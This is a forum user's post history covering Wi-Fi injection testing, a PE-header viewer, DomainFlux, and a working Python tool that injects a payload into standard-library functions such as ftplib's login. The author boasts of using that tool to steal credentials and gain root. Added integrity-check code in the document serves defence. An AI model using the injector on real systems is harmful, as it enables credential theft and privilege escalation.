Messages - Zer0Flag

1
Hardware / Re: alfa usb wifi problems
« on: August 16, 2012, 03:33:37 pm »
This is a known issue with the NHR. It seems there are no drivers supporting it fully right now because it's the latest Alfa stick.
 
A better choice would be the NH :)

~Zer0Flag

2
Hardware / Re: alfa usb wifi problems
« on: August 16, 2012, 02:25:15 pm »
I have the same problem with my NHR, but if you check whether injection is working, it should work. Maybe try the compat-wireless drivers? The last time I tested them they didn't seem to work (http://linuxwireless.org/download/compat-wireless-2.6/). You may also want to check out this thread: http://www.backtrack-linux.org/forums/showthread.php?t=45323&page=5

Code:
root@bt:~# aireplay-ng -9 -i mon0 wlan1
14:24:02  Trying broadcast probe requests...
14:24:04  No Answer...
14:24:04  Found 1 AP
14:24:04  Trying directed probe requests...
14:24:04  00:01:E3:**:**:** - channel: 8 - '******'
14:24:05  Ping (min/avg/max): 3.509ms/16.190ms/45.019ms Power: -66.55
14:24:05  29/30:  96%
14:24:05  Injection is working!
14:24:05  Trying card-to-card injection...
14:24:05  Attack -0:           OK
14:24:05  Attack -1 (open):    OK
14:24:05  Attack -1 (psk):     OK
14:24:05  Attack -2/-3/-4/-6:  OK
14:24:05  Attack -5/-7:        OK

~Zer0Flag

3
Scripting Languages / Re: [Python] Python Module Infection
« on: July 06, 2012, 11:40:35 pm »
Sure, they need to be reloaded to import the infected module. But just think about a backup script in .py which stores the .tar.gz on an FTP server... and the script needs to be executed with admin rights to access all folders which need to be saved...

Sure, those are a lot of conditions which need to be true for a successful attack, but I already used this several times to get root access on a box and I think it's very dangerous.

~Zer0Flag

4
Other / Re: Where to get IDA Pro or other Decompiler?
« on: July 03, 2012, 10:02:28 pm »
If you only want a disassembler / debugger you could take a look at OllyDbg or Immunity Debugger ( a clone of Olly, but with better Python scripting support and several improvements ). For a decompiler you should look for one specific to each programming language. But IDA is one of the best tools you can get for malware analysis and you can extend it easily for new formats / file types, with plugins, Python support etc. ( I just love it ).

~Zer0Flag

5
Scripting Languages / Re: [Python] Python Module Infection
« on: June 21, 2012, 12:06:46 am »
I didn't say that CRC checks would be the ultimate protection; there is always a way to bypass the checks. But as it is, it's dangerous to use py scripts on your roots... ( And no, I don't have anything against py! I love it! )

~Zer0

6
Scripting Languages / Re: [Python] Python Module Infection
« on: June 20, 2012, 10:12:42 pm »
Well, but e.g. when you got access to a root and you see that the admin uses a backup Python script, you could inject into the used functions and get your code executed with root rights. So I think it is a fail of Python not to check whether the local libs got modified or not. A little CRC check when the libs get imported, and a warning to the user that he should be careful, would be nice and easy to implement...

~Zer0

7
Scripting Languages / [Python] Python Module Infection
« on: June 20, 2012, 08:49:58 pm »
Hello,
 
I recognized that you can modify default Python modules like "ftplib" and there are no checks whether the module got modified, and through that you can inject code which gets executed by all scripts which use the modified function. For example this could be used to execute code with admin rights even if your user doesn't have these rights. Or to log FTP connections ( user, passwd, host, port... ) and a lot more. I didn't find anything about this issue on Google and I don't know if this is a known issue.

I created a small script which helps to inject your code for testing purposes.
Code:
#!/usr/bin/python
#
# Coder   : Zer0Flag
# Date    : 18.06.2012
# Contact : zer0fl4g@googlemail.com
#
# Usage   : PyRTInfect.py -l <file you want inject into> -f <function you want inject into> -c <file you want to inject>
#           PyRTInfect.py -l <file you want to clean>
#
# Example : PyRTInfect.py -l C:\Python2.7\Lib\ftplib.py -f login -c C:\MyEvilPayload.py
#           PyRTInfect.py -l /usr/lib/python2.6/ftplib.py -f login -c /home/MyEvilPayload.py
#
# Tested  : Windows XP SP3 @ Python 2.7
#           Windows 7 SP1 @ Python 2.7
#           BackTrack 5 @ Python 2.6
#
# Python 2 code (print statement, "except X, e"), as in the original post.

import sys

def PrintUsage():
    print 'Usage:\n\t%s -l <file> -f <function> -c <file.to.inject>' % sys.argv[0]
    print '\t%s -l <file>\t#Clear all Injections' % sys.argv[0]

def InjectIntoRT(sFileToInfect,sFunctionToInfect,sFileToInject):
    # Inserts the lines of sFileToInject after the line that follows
    # "def <sFunctionToInfect>", framed by "#1:Injected" / "#2:Injected"
    # marker lines so that ClearRTFile() can remove them again.
    if len(sFileToInfect) != 0 and len(sFunctionToInfect) != 0 and len(sFileToInject) != 0:
        sFTI = open(sFileToInfect,'r+')
        sFTIn = open(sFileToInject,'r')    # the payload file is only read

        bGoOn = True
        bWriteData = True
        iLineCounter = 0
        IWCount = 0
        sBackUpTFI = sFTI.readlines()      # copy of the original lines
        sFTI.seek(0)

        while bGoOn:
            iLineCounter += 1
            sLine = sFTI.readline()
            if sLine == '':
                # EOF without a match (the original looped here forever)
                print '[-] Function: \"%s\" not found' % sFunctionToInfect
                bGoOn = False
            elif ('def ' + sFunctionToInfect) in sLine:
                print '[+] Function: \"%s\" found at %d' % (sFunctionToInfect,iLineCounter)
                print '[+] Going to Inject following lines!\n'
                sLinesToInject = sFTIn.readlines()
                for sLTI in sLinesToInject:
                    print sLTI

                # rewrite the whole file from the backup, adding the payload
                sFTI.seek(0)
                while bWriteData:
                    try:
                        sFTI.write(sBackUpTFI[IWCount])
                        if IWCount == iLineCounter:
                            sFTI.write('\t#1:Injected\n')
                            sFTI.writelines(sLinesToInject)
                            sFTI.write('\n\t#2:Injected\n')
                        IWCount += 1
                    except IndexError,e:
                        bWriteData = False
                sFTI.truncate()
                bGoOn = False

        sFTI.close()
        sFTIn.close()
    else:
        return 0
    return 1

def ClearRTFile(sFileName):
    # Rewrites the file without everything between the two marker lines.
    fRTFile = open(sFileName,'r+')
    fBackUp = fRTFile.readlines()
    fRTFile.seek(0)
    bWriteOk = True
    iCounter = 0

    for sLine in fBackUp:
        if '#1:Injected' in sLine:
            bWriteOk = False
            print '[+] Injected Line Found at %d' % iCounter
        elif '#2:Injected' in sLine:
            bWriteOk = True
            continue

        if bWriteOk:
            fRTFile.write(sLine)
        iCounter += 1
    # The cleaned file is shorter than the old one: cut off the remainder
    # (without this the tail of the old content stayed in the file).
    fRTFile.truncate()
    fRTFile.close()
    return 1

if __name__ == "__main__":
    if len(sys.argv) < 3:
        PrintUsage()
    elif len(sys.argv) == 3:
        for i in range(0,len(sys.argv)):
            if sys.argv[i] == '-l':
                ClearRTFile(sys.argv[i + 1])
    elif len(sys.argv) == 7:
        sFileToInfect = sFunctionToInfect = sFileToInject = ''   # stays empty if a flag is missing
        for i in range(0,len(sys.argv)):
            if sys.argv[i] == '-l':
                sFileToInfect = sys.argv[i + 1]
            elif sys.argv[i] == '-f':
                sFunctionToInfect = sys.argv[i + 1]
            elif sys.argv[i] == '-c':
                sFileToInject = sys.argv[i + 1]

        if InjectIntoRT(sFileToInfect,sFunctionToInfect,sFileToInject) == 0:
            PrintUsage()


~Zer0
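The two posts above describe the gap (nothing verifies a stdlib module such as ftplib before it is imported) and the proposed fix (a checksum at import time with a warning). The following is an added example written for this page, not Zer0Flag's tool and not part of Python itself: a meta-path finder that compares the SHA-256 of a module's source file with a trusted manifest and refuses the import on mismatch. The module name `backup_helper_demo`, the temporary directory and the manifest are constructed for the demonstration; SHA-256 is used instead of a CRC because a CRC can be matched by an attacker who can also edit the file.

```python
"""Import-time integrity check for Python modules (added example)."""
import hashlib
import importlib
import importlib.abc
import importlib.machinery
import os
import shutil
import sys
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(paths):
    """Trusted hashes keyed by absolute path; build this from a known-good install."""
    return {os.path.abspath(p): sha256_file(p) for p in paths}


def verify_manifest(manifest):
    """Offline check, e.g. from cron: {path: 'ok' | 'modified' | 'missing'}."""
    result = {}
    for path, expected in manifest.items():
        if not os.path.exists(path):
            result[path] = "missing"
        elif sha256_file(path) != expected:
            result[path] = "modified"
        else:
            result[path] = "ok"
    return result


class IntegrityFinder(importlib.abc.MetaPathFinder):
    """Sits first on sys.meta_path and blocks manifest-listed modules whose source changed."""

    def __init__(self, manifest):
        self.manifest = manifest

    def find_spec(self, fullname, path, target=None):
        # Let the normal path-based machinery locate the module, then check it.
        spec = importlib.machinery.PathFinder.find_spec(fullname, path)
        if spec is None or not spec.origin:
            return None  # builtins, frozen modules etc. are handled by the other finders
        origin = os.path.abspath(spec.origin)
        expected = self.manifest.get(origin)
        if expected is not None and sha256_file(origin) != expected:
            raise ImportError("integrity check failed for %s (%s)" % (fullname, origin))
        return spec


def demo():
    """Constructed scenario: a helper module is hashed, imported, tampered with, re-imported."""
    tmp = tempfile.mkdtemp()
    name = "backup_helper_demo"  # hypothetical module name
    modpath = os.path.join(tmp, name + ".py")
    with open(modpath, "w") as f:
        f.write("def login(host, user):\n    return 'connecting to %s as %s' % (host, user)\n")
    sys.path.insert(0, tmp)
    manifest = build_manifest([modpath])
    finder = IntegrityFinder(manifest)
    sys.meta_path.insert(0, finder)
    try:
        first = importlib.import_module(name).login("ftp.example", "backup")
        # Simulate tampering: append a line to the module source.
        with open(modpath, "a") as f:
            f.write("\n# tampered\n")
        sys.modules.pop(name, None)
        importlib.invalidate_caches()
        try:
            importlib.import_module(name)
            second = "imported"
        except ImportError:
            second = "blocked"
        return first, verify_manifest(manifest)[os.path.abspath(modpath)], second
    finally:
        sys.meta_path.remove(finder)
        sys.path.remove(tmp)
        sys.modules.pop(name, None)
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The finder only hashes the `.py` source; a modified `.pyc` in `__pycache__` whose header still matches the source's size and mtime would be loaded without recompilation, so a manifest for production hosts should cover the cached bytecode as well, or bytecode caching should be disabled for the checked paths. The manifest itself has to live somewhere the account running the script cannot write, otherwise an attacker who can edit the library can update the hash too.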

8
Hacking and Security / Re: FTP scan -stats-
« on: January 21, 2012, 11:45:52 am »
I guess you used some box to scan that? And how long did it take?

~Zer0

9
C - C++ / Re: [C++] PEPrinter
« on: October 13, 2011, 06:04:57 pm »
Yeah, the support is fine under Windows for that :).

Ok, sorry. I'm used to coding in VS ( a C++ compiler, but able to compile C too ) and sometimes mix up elements of both languages.

10
C - C++ / [C++] PEPrinter
« on: October 12, 2011, 07:16:19 am »
Just another PE viewer: shows the PE header, imports, exports and TLS.

Code:
/* (C) Zer0Flag@drunken-nanomites.org */
// Parses 32-bit (PE32) images only: IMAGE_NT_HEADERS32, IMAGE_THUNK_DATA32 and
// IMAGE_TLS_DIRECTORY32 are assumed throughout. Build as a Win32 GUI application;
// the program allocates its own console for printf().
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>

// Translate the virtual address of data directory entry iTableEntryNr into a
// pointer into the raw file buffer by finding the section that contains it.
// Returns NULL when the directory is empty or not backed by any section.
BYTE* CalculateTableOffset(int iTableEntryNr, PIMAGE_NT_HEADERS32 pINH, PIMAGE_DOS_HEADER pIDH, BYTE* pBuffer)
{
    DWORD tableVA = pINH->OptionalHeader.DataDirectory[iTableEntryNr].VirtualAddress;
    if (tableVA == 0) return NULL;
    PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)(pBuffer + pIDH->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
    for (WORD i = 0; i < pINH->FileHeader.NumberOfSections; i++)
    {
        DWORD sectionVA = pSectionHeader->VirtualAddress;
        DWORD sectionSize = pSectionHeader->Misc.VirtualSize;
        if ((sectionVA <= tableVA) && (tableVA < (sectionVA + sectionSize)))
        {
            return pBuffer + pSectionHeader->PointerToRawData + (tableVA - sectionVA);
        }
        pSectionHeader++;
    }
    return NULL;
}

// Resolve an RVA referenced from a table (import names, thunks, export arrays)
// relative to that table's position in the file. This assumes the referenced
// data lies in the same section as the table, which holds for typical linkers.
static BYTE* RelToTable(BYTE* pTable, DWORD dwTableVA, DWORD dwRVA)
{
    return pTable + (LONG)(dwRVA - dwTableVA);
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
    // Init our console for printf
    if (!AllocConsole()) return 1;
    freopen("CONOUT$", "wt", stdout);
    SetConsoleTitleA("PEView");
    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_GREEN | FOREGROUND_BLUE | FOREGROUND_RED);

    // the command line is the path of the file to inspect
    if (lpCmdLine == NULL || lpCmdLine[0] == '\0') return 1;
    HANDLE hFile = CreateFileA(lpCmdLine, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Cannot open %s\r\n", lpCmdLine);
        return 1;
    }
    DWORD dwFileSize = GetFileSize(hFile, NULL);
    if (dwFileSize == INVALID_FILE_SIZE || dwFileSize < sizeof(IMAGE_DOS_HEADER))
    {
        CloseHandle(hFile);
        return 1;
    }
    BYTE* pFileBuffer = new BYTE[dwFileSize];
    DWORD dwBytesRead = 0;
    if (!ReadFile(hFile, pFileBuffer, dwFileSize, &dwBytesRead, NULL) || dwBytesRead != dwFileSize)
    {
        delete [] pFileBuffer;
        CloseHandle(hFile);
        return 1;
    }
    CloseHandle(hFile);   // everything below works on the in-memory copy

    PIMAGE_DOS_HEADER pIDH = (PIMAGE_DOS_HEADER)pFileBuffer;
    if (pIDH->e_magic != IMAGE_DOS_SIGNATURE)
    {
        printf("No MZ signature\r\n");
        delete [] pFileBuffer;
        return 1;
    }
    // e_lfanew, the NT headers and the section table must lie inside the file
    if (pIDH->e_lfanew < 0 || (DWORD)pIDH->e_lfanew + sizeof(IMAGE_NT_HEADERS32) > dwFileSize)
    {
        printf("e_lfanew points outside the file\r\n");
        delete [] pFileBuffer;
        return 1;
    }
    PIMAGE_NT_HEADERS32 pINH = (PIMAGE_NT_HEADERS32)(pFileBuffer + pIDH->e_lfanew);
    if (pINH->Signature != IMAGE_NT_SIGNATURE || pINH->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    {
        printf("Not a PE32 image\r\n");
        delete [] pFileBuffer;
        return 1;
    }
    if ((DWORD)pIDH->e_lfanew + sizeof(IMAGE_NT_HEADERS32) + pINH->FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER) > dwFileSize)
    {
        printf("Section table is truncated\r\n");
        delete [] pFileBuffer;
        return 1;
    }

    //IMAGE_DOS_HEADER
    printf("\r\nIMAGE_DOS_HEADER:\r\n\te_magic:\t\t\t0x%08X\r\n\te_cblp:\t\t\t\t0x%08X\r\n\te_cp:\t\t\t\t0x%08X\r\n\te_crlc:\t\t\t\t0x%08X\r\n\t",
        pIDH->e_magic,
        pIDH->e_cblp,
        pIDH->e_cp,
        pIDH->e_crlc);
    printf("e_cparhdr:\t\t\t0x%08X\r\n\te_minalloc:\t\t\t0x%08X\r\n\te_maxalloc:\t\t\t0x%08X\r\n\te_ss:\t\t\t\t0x%08X\r\n\t",
        pIDH->e_cparhdr,
        pIDH->e_minalloc,
        pIDH->e_maxalloc,
        pIDH->e_ss);
    printf("e_sp:\t\t\t\t0x%08X\r\n\te_csum:\t\t\t\t0x%08X\r\n\te_ip:\t\t\t\t0x%08X\r\n\te_cs:\t\t\t\t0x%08X\r\n\t",
        pIDH->e_sp,
        pIDH->e_csum,
        pIDH->e_ip,
        pIDH->e_cs);
    // e_res and e_res2 are WORD arrays; print their first word
    printf("e_lfarlc:\t\t\t0x%08X\r\n\te_ovno:\t\t\t\t0x%08X\r\n\te_res:\t\t\t\t0x%08X\r\n\te_oemid:\t\t\t0x%08X\r\n\t",
        pIDH->e_lfarlc,
        pIDH->e_ovno,
        pIDH->e_res[0],
        pIDH->e_oemid);
    printf("e_oeminfo:\t\t\t0x%08X\r\n\te_res2:\t\t\t\t0x%08X\r\n\te_lfanew:\t\t\t0x%08X\r\n",
        pIDH->e_oeminfo,
        pIDH->e_res2[0],
        pIDH->e_lfanew);

    //IMAGE_FILE_HEADER
    printf("\r\nIMAGE_FILE_HEADER:\r\n\tMachine:\t\t\t0x%08X\r\n\tNumberOfSections:\t\t0x%08X\r\n\tTimeDateStamp:\t\t\t0x%08X\r\n\tPointerToSymbolTable:\t\t0x%08X\r\n\t",
        pINH->FileHeader.Machine,
        pINH->FileHeader.NumberOfSections,
        pINH->FileHeader.TimeDateStamp,
        pINH->FileHeader.PointerToSymbolTable);
    printf("NumberOfSymbols:\t\t0x%08X\r\n\tSizeOfOptionalHeader:\t\t0x%08X\r\n\tCharacteristics:\t\t0x%08X\r\n",
        pINH->FileHeader.NumberOfSymbols,
        pINH->FileHeader.SizeOfOptionalHeader,
        pINH->FileHeader.Characteristics);
    //IMAGE_OPTIONAL_HEADER
    printf("\r\nIMAGE_OPTIONAL_HEADER:\r\n\tMagic:\t\t\t\t0x%08X\r\n\tMajorLinkerVersion:\t\t0x%08X\r\n\tMinorLinkerVersion:\t\t0x%08X\r\n\tSizeOfCode:\t\t\t0x%08X\r\n\t",
        pINH->OptionalHeader.Magic,
        pINH->OptionalHeader.MajorLinkerVersion,
        pINH->OptionalHeader.MinorLinkerVersion,
        pINH->OptionalHeader.SizeOfCode);
    printf("SizeOfInitializedData:\t\t0x%08X\r\n\tSizeOfUninitializedData:\t0x%08X\r\n\tAddressOfEntryPoint:\t\t0x%08X\r\n\tBaseOfCode:\t\t\t0x%08X\r\n\tBaseOfData:\t\t\t0x%08X\r\n",
        pINH->OptionalHeader.SizeOfInitializedData,
        pINH->OptionalHeader.SizeOfUninitializedData,
        pINH->OptionalHeader.AddressOfEntryPoint,
        pINH->OptionalHeader.BaseOfCode,
        pINH->OptionalHeader.BaseOfData);
    printf("\tImageBase:\t\t\t0x%08X\r\n\tSectionAlignment:\t\t0x%08X\r\n\tFileAlignment:\t\t\t0x%08X\r\n\tMajorOperatingSystemVersion:\t0x%08X\r\n\t",
        pINH->OptionalHeader.ImageBase,
        pINH->OptionalHeader.SectionAlignment,
        pINH->OptionalHeader.FileAlignment,
        pINH->OptionalHeader.MajorOperatingSystemVersion);
    printf("MinorOperatingSystemVersion:\t0x%08X\r\n\tMajorImageVersion:\t\t0x%08X\r\n\tMinorImageVersion:\t\t0x%08X\r\n\tMajorSubsystemVersion:\t\t0x%08X\r\n\tMinorSubsystemVersion:\t\t0x%08X\r\n",
        pINH->OptionalHeader.MinorOperatingSystemVersion,
        pINH->OptionalHeader.MajorImageVersion,
        pINH->OptionalHeader.MinorImageVersion,
        pINH->OptionalHeader.MajorSubsystemVersion,
        pINH->OptionalHeader.MinorSubsystemVersion);
    printf("\tWin32VersionValue:\t\t0x%08X\r\n\tSizeOfImage:\t\t\t0x%08X\r\n\tSizeOfHeaders:\t\t\t0x%08X\r\n\tCheckSum:\t\t\t0x%08X\r\n\t",
        pINH->OptionalHeader.Win32VersionValue,
        pINH->OptionalHeader.SizeOfImage,
        pINH->OptionalHeader.SizeOfHeaders,
        pINH->OptionalHeader.CheckSum);
    printf("Subsystem:\t\t\t0x%08X\r\n\tDllCharacteristics:\t\t0x%08X\r\n\tSizeOfStackReserve:\t\t0x%08X\r\n\tSizeOfStackCommit:\t\t0x%08X\r\n\t",
        pINH->OptionalHeader.Subsystem,
        pINH->OptionalHeader.DllCharacteristics,
        pINH->OptionalHeader.SizeOfStackReserve,
        pINH->OptionalHeader.SizeOfStackCommit);
    printf("SizeOfHeapReserve:\t\t0x%08X\r\n\tSizeOfHeapCommit:\t\t0x%08X\r\n\tLoaderFlags:\t\t\t0x%08X\r\n\tNumberOfRvaAndSizes:\t\t0x%08X\r\n\t",
        pINH->OptionalHeader.SizeOfHeapReserve,
        pINH->OptionalHeader.SizeOfHeapCommit,
        pINH->OptionalHeader.LoaderFlags,
        pINH->OptionalHeader.NumberOfRvaAndSizes);
    //IMAGE_DATA_DIRS (the array has IMAGE_NUMBEROF_DIRECTORY_ENTRIES slots, whatever the header claims)
    printf("\r\nIMAGE_DATA_DIRECTORY:\r\n");
    DWORD dwDirs = pINH->OptionalHeader.NumberOfRvaAndSizes;
    if (dwDirs > IMAGE_NUMBEROF_DIRECTORY_ENTRIES) dwDirs = IMAGE_NUMBEROF_DIRECTORY_ENTRIES;
    for (DWORD i = 0; i < dwDirs; i++)
    {
        printf("\t Nr.%02d: VA: 0x%08X Size: 0x%08X\r\n",
            i,
            pINH->OptionalHeader.DataDirectory[i].VirtualAddress,
            pINH->OptionalHeader.DataDirectory[i].Size);
    }
    //IMAGE_SECTION_HEADER (Name is 8 bytes and not necessarily NUL-terminated, hence %.8s)
    printf("\r\nIMAGE_SECTION_HEADER:\r\n");
    PIMAGE_SECTION_HEADER pSH = (PIMAGE_SECTION_HEADER)(pFileBuffer + pIDH->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
    for (int i = 0; i < pINH->FileHeader.NumberOfSections; i++)
    {
        printf("\tName:\t\t\t%.8s\r\n\tVirtualSize:\t\t0x%08X\r\n\tVirtualAdress:\t\t0x%08X\r\n\tSizeOfRawData:\t\t0x%08X\r\n\tPointerToRawData:\t0x%08X\r\n\tCharacteristics:\t0x%08X\r\n",
            pSH->Name,
            pSH->Misc.VirtualSize,
            pSH->VirtualAddress,
            pSH->SizeOfRawData,
            pSH->PointerToRawData,
            pSH->Characteristics);
        pSH++;
    }
    DWORD dwVAOfImportSection = pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
    BYTE* pImportSection = CalculateTableOffset(IMAGE_DIRECTORY_ENTRY_IMPORT, pINH, pIDH, pFileBuffer);
    if (pImportSection != NULL)
    {
        PIMAGE_IMPORT_DESCRIPTOR pImportHeader = (PIMAGE_IMPORT_DESCRIPTOR)pImportSection;
        //IMAGE_IMPORTS_DESCRIPTORS: the array ends with an all-zero descriptor
        printf("\r\nFILE_IMPORTS:\r\n");
        while (pImportHeader->Name)
        {
            printf("\r\n\tName:\t\t\t%s\r\n\tCharacteristics:\t0x%08X\r\n\tFirstThunk(IAT):\t0x%08X\r\n\tOriginalFirstThunk(INT):0x%08X\r\n\tForwarderChain:\t\t0x%08X\r\n\tTimeDateStamp:\t\t0x%08X\r\n",
                (char*)RelToTable(pImportSection, dwVAOfImportSection, pImportHeader->Name),
                pImportHeader->Characteristics,
                pImportHeader->FirstThunk,
                pImportHeader->OriginalFirstThunk,
                pImportHeader->ForwarderChain,
                pImportHeader->TimeDateStamp);
            // On disk the IAT (FirstThunk) still holds the same entries as the INT
            DWORD rvaIAT = pImportHeader->FirstThunk;
            PIMAGE_THUNK_DATA32 pIAT = (PIMAGE_THUNK_DATA32)RelToTable(pImportSection, dwVAOfImportSection, rvaIAT);
            if (pIAT->u1.Ordinal) //maybe no imports from dll
            {
                printf("\r\n\tIMPORTS:\r\n");
                do
                {
                    if (IMAGE_SNAP_BY_ORDINAL32(pIAT->u1.Ordinal))
                    {
                        //by ordinal
                        printf("\tOrdinal:\t\t\t0x%08X\r\n",
                            IMAGE_ORDINAL32(pIAT->u1.Ordinal));
                    }
                    else
                    {
                        //by name
                        PIMAGE_IMPORT_BY_NAME pImportName = (PIMAGE_IMPORT_BY_NAME)RelToTable(pImportSection, dwVAOfImportSection, pIAT->u1.AddressOfData);
                        printf("\t\tName:\t\t%s\r\n\t\tHint:\t\t0x%08X\r\n",
                            pImportName->Name,
                            pImportName->Hint);
                    }
                    pIAT++;
                } while (pIAT->u1.AddressOfData != 0);
            }
            pImportHeader++;
        }
    }
    DWORD exportTableVA = pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    BYTE* pExportSection = CalculateTableOffset(IMAGE_DIRECTORY_ENTRY_EXPORT, pINH, pIDH, pFileBuffer);
    if (pExportSection != NULL)
    {
        //IMAGE_EXPORT_DESCRIPTORS
        printf("\r\n\tFILE_EXPORTS:\r\n");
        PIMAGE_EXPORT_DIRECTORY pExportTable = (PIMAGE_EXPORT_DIRECTORY)pExportSection;

        printf("\tName:\t\t\t%s\r\n\tBase:\t\t\t0x%08X\r\n\tNumberOfFunctions:\t0x%08X\r\n\tNumberOfNames:\t0x%08X\r\n\tAddressOfFunctions:\t\t0x%08X\r\n\tAddressOfNameOrdinals:\t0x%08X\r\n",
            (char*)RelToTable(pExportSection, exportTableVA, pExportTable->Name),
            pExportTable->Base,
            pExportTable->NumberOfFunctions,
            pExportTable->NumberOfNames,
            pExportTable->AddressOfFunctions,
            pExportTable->AddressOfNameOrdinals);
        DWORD* addressOfFunctionsArray = (DWORD*)RelToTable(pExportSection, exportTableVA, pExportTable->AddressOfFunctions);
        DWORD* addressOfNamesArray = (DWORD*)RelToTable(pExportSection, exportTableVA, pExportTable->AddressOfNames);
        WORD* addressOfNameOrdinalsArray = (WORD*)RelToTable(pExportSection, exportTableVA, pExportTable->AddressOfNameOrdinals);
        for (DWORD i = 0; i < pExportTable->NumberOfNames; i++)
        {
            // the name ordinal indexes AddressOfFunctions; refuse to read past that array
            WORD wOrdinal = addressOfNameOrdinalsArray[i];
            printf("\tName:\t\t\t%s\r\n\tOrdinal:\t\t\t0x%08X\r\n\tName Ordinal:\t0x%08X\r\n\tAdress(RVA):\t0x%08X\r\n",
                (char*)RelToTable(pExportSection, exportTableVA, addressOfNamesArray[i]),
                (wOrdinal + pExportTable->Base),
                wOrdinal,
                (wOrdinal < pExportTable->NumberOfFunctions) ? addressOfFunctionsArray[wOrdinal] : 0);
        }
    }
    BYTE* pTLSTable = CalculateTableOffset(IMAGE_DIRECTORY_ENTRY_TLS, pINH, pIDH, pFileBuffer);
    if (pTLSTable != NULL)
    {
        //IMAGE_TLS_DIRECTORY (all fields are DWORDs in the 32-bit layout)
        printf("\r\nTLS-TABLE:\r\n");
        PIMAGE_TLS_DIRECTORY32 pTLS = (PIMAGE_TLS_DIRECTORY32)pTLSTable;
        printf("\tStartAddressOfRawData:\t0x%08X\r\n\tEndAddressOfRawData:\t0x%08X\r\n\tSizeOfZeroFill:\t0x%08X\r\n\tCharacteristics:\t0x%08X\r\n\tAddressOfIndex:\t0x%08X\r\n\tAddressOfCallBacks:\t0x%08X\r\n",
            pTLS->StartAddressOfRawData,
            pTLS->EndAddressOfRawData,
            pTLS->SizeOfZeroFill,
            pTLS->Characteristics,
            pTLS->AddressOfIndex,
            pTLS->AddressOfCallBacks);
    }
    delete [] pFileBuffer;
    system("pause");
    return 0;
}


~Zer0Flag
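PEPrinter resolves a data directory's virtual address to a file position by walking the section table, and it relies on every referenced string or array being in the same section as its table. The example below is added here and is not Zer0Flag's code: it reimplements that RVA-to-file-offset mapping in Python over a constructed section table and makes explicit the two cases the C++ version leaves to the caller, an RVA inside the headers (before the first section) and an RVA that lies in a section's virtual range but beyond the section's raw data on disk. The section values, file size and `SizeOfHeaders` are made up for the demonstration.

```python
"""RVA-to-file-offset translation with bounds checks (added example)."""
from collections import namedtuple

# Same fields as IMAGE_SECTION_HEADER, reduced to what the mapping needs.
Section = namedtuple(
    "Section", "name virtual_address virtual_size pointer_to_raw_data size_of_raw_data")

# Constructed section table of a small PE32 image (hypothetical values).
SECTIONS = [
    Section(b".text", 0x1000, 0x0800, 0x0400, 0x0800),
    Section(b".rdata", 0x2000, 0x0600, 0x0C00, 0x0600),
    # mostly .bss: VirtualSize is larger than SizeOfRawData, so only the first
    # 0x200 bytes of the section exist in the file
    Section(b".data", 0x3000, 0x2000, 0x1200, 0x0200),
]
FILE_SIZE = 0x1400
SIZE_OF_HEADERS = 0x400


def rva_to_offset(rva, sections, file_size, size_of_headers):
    """Return (file_offset, section_name) for rva, or raise ValueError.

    An RVA below SizeOfHeaders maps 1:1, because the headers are not described
    by any section. Otherwise the containing section decides, and the RVA must
    be backed by raw data that lies inside the file.
    """
    if rva < size_of_headers:
        return rva, b"<headers>"
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + s.virtual_size:
            delta = rva - s.virtual_address
            if delta >= s.size_of_raw_data:
                raise ValueError("RVA 0x%X is in %s but has no raw data on disk"
                                 % (rva, s.name.decode()))
            offset = s.pointer_to_raw_data + delta
            if offset >= file_size:
                raise ValueError("RVA 0x%X maps past the end of the file" % rva)
            return offset, s.name
    raise ValueError("RVA 0x%X is not covered by any section" % rva)


def resolve_directory(rva, size, sections, file_size, size_of_headers):
    """Check that a whole data directory [rva, rva+size) can be read from the file.

    Returns (start_offset, end_offset, section_name); the whole range must sit
    in one section, which is the assumption PEPrinter makes for its tables.
    """
    start, name = rva_to_offset(rva, sections, file_size, size_of_headers)
    last, name_last = rva_to_offset(rva + size - 1, sections, file_size, size_of_headers)
    if name != name_last:
        raise ValueError("directory spans sections %s and %s"
                         % (name.decode(), name_last.decode()))
    return start, last + 1, name


if __name__ == "__main__":
    # An import table at RVA 0x2010, 0x28 bytes long, resolves to .rdata
    print(resolve_directory(0x2010, 0x28, SECTIONS, FILE_SIZE, SIZE_OF_HEADERS))
    for rva in (0x100, 0x3100, 0x3300, 0x5000):
        try:
            print(hex(rva), rva_to_offset(rva, SECTIONS, FILE_SIZE, SIZE_OF_HEADERS))
        except ValueError as e:
            print(hex(rva), "rejected:", e)
```

A directory whose RVA fails these checks is exactly the input that makes an unchecked viewer read outside its buffer, so a parser used on untrusted samples should reject the table rather than follow the pointer.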

11
C - C++ / Re: [C++] DomainFlux
« on: September 07, 2011, 09:13:17 pm »
Yeap, that was for the case somebody just wants to copy it and do shit. It's meant for people to understand a bit more about DomainFlux ( and worked great for some users, as we see :) ).

~0

12
C - C++ / Re: [C++] DomainFlux
« on: September 07, 2011, 07:28:37 pm »
Well, there are millions of ways you can design such an algorithm. This one is one of the easiest and, well, it is easy to reverse. For example you could implement a grab of the top news of the day and generate something from them. So this is only an example of how you could do it. I made this with a short explanation of what DomainFlux is, since one user wanted to sell something like that for 75$ O_o

~Zer0 

13
C - C++ / [C++] DomainFlux
« on: September 07, 2011, 06:11:53 pm »
I saw someone selling something like that in a forum and I thought that can't be true.

